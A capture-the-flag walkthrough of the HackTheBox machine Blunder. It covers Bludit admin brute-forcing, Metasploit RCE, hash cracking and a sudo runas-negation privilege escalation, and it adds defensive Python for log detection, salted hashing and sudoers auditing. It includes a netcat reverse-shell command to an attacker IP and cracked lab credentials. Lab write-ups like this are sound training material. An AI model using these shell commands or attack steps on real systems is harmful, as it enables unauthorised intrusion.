This box was an easy-level Linux box on HTB created by egotisticalSW. It started with discovering a todo.txt file on the web server which had a username, fergus. We use that username to brute-force the admin panel of Bludit with a wordlist created from the website using cewl. We use those auth creds in the Metasploit exploit exploit/linux/http/bludit_upload_images_exec to get a shell on the server. On enumerating the box we find a newer version of Bludit which has the hashed password of user hugo; after cracking it we get access as user Hugo. Root, based on a sudo vulnerability, was the easiest part of the box.
As always, let's start off with nmap (nmap -sC for default scripts). Alright, if it isn't obvious yet, I am an IPPSEC fanboi. Aight, firing up nmap to scan for open ports on the box.
And here is our nmap result
Interesting, only one port open. Alright, let's run an all-port scan with nmap -p- -T4 10.10.10.191 and start enumerating the web server.
Enumerating the web server
The About section has a note: "I created this site to dump my fact files, nothing more.......?". I did some basic enum like checking for robots.txt and reading the source code but got nothing. So let's start a gobuster scan for directory fuzzing.
todo.txt and the admin page look interesting; checking out the todo.txt file first.
fergus looks like a username.
Let's check the /admin panel.
Bludit is a CMS, and searching for Bludit in Metasploit gives us an RCE exploit, but it needs the authentication creds of the admin panel.
Time to analyse what information we have gathered so far. First, a username: fergus. Second, a Metasploit exploit module for Bludit that can give us RCE but needs authentication creds. Also the note in the website's About section, "I created this site to dump my fact files, nothing more.......?", so it can be assumed we need to brute-force the creds of user fergus, and the password might be any word on the website, as the site exists to dump the user's fact files. NGL.. I had a hard time figuring out that we need a wordlist created from the website for the brute force.
Creating the wordlist.
Brute-forcing the /admin page with that wordlist gives us the creds fergus:RolandDeschain.
Now let's use Metasploit to get a shell on the box. You can also exploit it manually, but I was a beginner when I did this box the first time, so I used Metasploit for it.
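From the defender's side, the brute force above is loud: one client sends a burst of POST requests to the admin login in a short window. The following is an added example (not from the original write-up) of a small detector over web-server access logs. It assumes a combined log format, a login path of /admin/login, and the constructed sample lines embedded below; the IPs and timestamps are made up. It counts POST volume per source IP inside a sliding window rather than relying on status codes, since a CMS login form can return 200 on failure and a redirect on success.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip ident user [ts] "METHOD path proto" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def parse_ts(ts: str) -> datetime:
    # e.g. 26/Jul/2020:10:00:01 +0000
    return datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")

def detect_login_bruteforce(log_text: str, login_path: str = "/admin/login",
                            threshold: int = 10,
                            window: timedelta = timedelta(seconds=60)) -> dict:
    """Return {ip: peak_attempts} for IPs that POSTed to login_path
    at least `threshold` times inside any `window`-long interval."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse
        if m["method"] != "POST" or not m["path"].startswith(login_path):
            continue
        attempts[m["ip"]].append(parse_ts(m["ts"]))

    alerts = {}
    for ip, times in attempts.items():
        times.sort()
        start, peak = 0, 0
        # two-pointer sliding window over sorted timestamps
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[ip] = peak
    return alerts

def _line(ip, ts, method, path, status):
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'

# Constructed sample log: 12 login POSTs from one IP in 11 seconds (the brute
# force), plus a normal visitor with two widely spaced logins and a GET.
SAMPLE_LOG = "\n".join(
    [_line("10.10.14.10", f"26/Jul/2020:10:00:{s:02d} +0000", "POST", "/admin/login", 200)
     for s in range(12)]
    + [_line("192.0.2.7", "26/Jul/2020:10:00:03 +0000", "GET", "/todo.txt", 200),
       _line("192.0.2.7", "26/Jul/2020:10:05:00 +0000", "POST", "/admin/login", 200),
       _line("192.0.2.7", "26/Jul/2020:10:09:00 +0000", "POST", "/admin/login", 302)]
)

if __name__ == "__main__":
    for ip, n in detect_login_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {ip}: {n} login POSTs within 60s")
```

Threshold and window are the knobs to tune against real traffic; rate limiting or lockout on the login route is the corresponding mitigation, and a wordlist-based guess would have taken many more than ten attempts here.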
Finding the exploit
Now you can use show options to list all the options of the exploit. We need to set Bludit's user and password, which can simply be done with set BLUDITUSER fergus and set BLUDITPASS RolandDeschain. Similarly set the values of RHOST, LHOST and LPORT. My configuration looked like this after setting the values.
After setting things up, simply type exploit or run.
Alright, we got a shell on the server as user www-data.
During basic enumeration I found a file user.php in /var/www/bludit-3.9.2/bl-content/databases which had the passwords of users, but it was a rabbit hole as those passwords were hashed with a salt. On enumerating more in /var/www we can find a newer version of Bludit, bludit-3.10.0a, and the passwords in the newer version's user.php aren't salted.
Throwing the hash faca404fd5c0a31cf1897b823c695c85cffeb98d into crackstation gives us user Hugo's password: Password120. To get a shell from meterpreter, use the shell command, then su Hugo and give the password Password120, and we have our user.
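The difference between the two databases is exactly why the first was a dead end and the second was not: an unsalted SHA-1 of a common password is the same everywhere, so a precomputed lookup table finds it instantly, while a per-user salt makes every stored hash unique. The block below is an added example, not the write-up's or Bludit's own code, and it does not reproduce Bludit's actual hashing routine; the salted variant is just salt + password, and the tiny wordlist is constructed for the demo.

```python
import hashlib
import hmac
import secrets

def sha1_unsalted(password: str) -> str:
    """What a lookup site can reverse: same input, same hash, everywhere."""
    return hashlib.sha1(password.encode()).hexdigest()

def sha1_salted(password: str, salt: str) -> str:
    """Assumed scheme for the demo (salt prepended); not Bludit's exact one."""
    return hashlib.sha1((salt + password).encode()).hexdigest()

def build_lookup_table(wordlist) -> dict:
    """Precomputed hash -> plaintext map, the kind of table crackstation holds."""
    return {sha1_unsalted(w): w for w in wordlist}

def lookup(hash_hex: str, table: dict):
    return table.get(hash_hex.lower())

def new_user_record(password: str) -> dict:
    """Store a fresh random salt next to the salted hash, as the 3.9.2 database did."""
    salt = secrets.token_hex(8)
    return {"salt": salt, "password": sha1_salted(password, salt)}

def verify_password(record: dict, candidate: str) -> bool:
    # constant-time compare so timing does not leak how many bytes matched
    return hmac.compare_digest(record["password"], sha1_salted(candidate, record["salt"]))

# Constructed wordlist for the demo
DEMO_WORDLIST = ["RolandDeschain", "Password120", "fergus"]

if __name__ == "__main__":
    table = build_lookup_table(DEMO_WORDLIST)
    print("unsalted ->", lookup(sha1_unsalted("Password120"), table))   # found
    rec = new_user_record("Password120")
    print("salted   ->", lookup(rec["password"], table))                # None
    print("verify   ->", verify_password(rec, "Password120"))           # True
```

Salting only defeats precomputation; SHA-1 remains fast enough that a guessed password list can still be tried against a single salted hash, which is why current guidance is a deliberately slow KDF (scrypt, bcrypt, Argon2) rather than a plain salted SHA-1.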
You can jump directly to the root part.
I am covering an issue I faced during this box… IDK why, but my meterpreter was messing up when I used the shell command; maybe I used the wrong payload. So I executed a nc reverse shell command and got another shell via nc. Yes, I could have changed the meterpreter payload and reused the Bludit exploit.
I tried nc 10.10.14.10 9001 -e /bin/bash but it didn't work, so I used this nc reverse shell command to get a revshell.
Rooting the box
As we have user Hugo's password, let's check if we have any sudo perms.
It reminded me of a sudo vulnerability, as I did something similar in a THM room (it could have been easily discovered using any enum script like linpeas too..), so let's check the sudo version.
Simply Googling sudo 1.8.25p1 exploit led us to this exploit. If you read the exploit, the perms match our current sudo -l perms.
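Two things have to line up for this privesc: a sudo build old enough to carry the bug, and a sudoers rule that grants a command with a negated runas user like (ALL, !root). An audit script that checks both is the kind of thing worth running over a fleet, so here is an added example (not from the write-up) that does that over a constructed sudoers snippet. The version cut-off of 1.8.28 is from my own knowledge of when sudo fixed the runas-negation bypass; the page itself only names 1.8.25p1 as vulnerable.

```python
import re

FIXED_IN = (1, 8, 28)  # assumption from my knowledge: sudo 1.8.28 fixed the (ALL, !root) bypass

# Sudoers rule: who host=(runas_users[:runas_groups]) [TAG:] command
RULE_RE = re.compile(r'^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmd>.+)$')

def parse_version(version_string: str) -> tuple:
    """'1.8.25p1' -> (1, 8, 25, 1); the trailing 'pN' patch level sorts after .25."""
    return tuple(int(x) for x in re.findall(r'\d+', version_string))

def version_is_affected(version_string: str) -> bool:
    return parse_version(version_string) < FIXED_IN

def find_runas_negation(sudoers_text: str) -> list:
    """Return (user, runas, command) for rules whose runas-user list contains a '!' entry."""
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.split('#', 1)[0].strip()   # drop comments and blank lines
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_users = m['runas'].split(':', 1)[0]            # ignore the group part
        if any(p.strip().startswith('!') for p in runas_users.split(',')):
            findings.append((m['who'], m['runas'].strip(), m['cmd'].strip()))
    return findings

def audit(sudoers_text: str, sudo_version: str) -> dict:
    findings = find_runas_negation(sudoers_text)
    affected = version_is_affected(sudo_version)
    return {
        "version_affected": affected,
        "negated_runas_rules": findings,
        "at_risk": affected and bool(findings),   # both conditions needed, as on this box
    }

# Constructed sudoers snippet; the hugo line mirrors the shape of the rule on the box.
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
hugo    ALL=(ALL, !root) /bin/bash
deploy  ALL=(www-data) NOPASSWD: /usr/bin/systemctl restart apache2
%admin  ALL=(ALL) ALL
"""

if __name__ == "__main__":
    report = audit(SAMPLE_SUDOERS, "1.8.25p1")
    for who, runas, cmd in report["negated_runas_rules"]:
        print(f"negated runas: {who} may run {cmd} as ({runas})")
    print("at risk:", report["at_risk"])
```

On a live host the inputs would be the output of sudo -V and the contents of /etc/sudoers plus /etc/sudoers.d/*. The fix is to upgrade sudo and, regardless of version, to replace a "everyone except root" exclusion with an explicit allow-list of the runas users that are actually needed.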
If you read the todo.txt file properly, there are 3 hints in it:
username - fergus
new blog needs images - The Bludit exploit was actually due to a vuln related to image uploads (hint for those who exploited it manually instead of with the Metasploit module).
Update the CMS - The box had two Bludit versions, and we got the user's password from the updated version.
Always read TODO notes properly.
Hope you learned something new; if you face any issues or have any query, feel free to contact me on social media.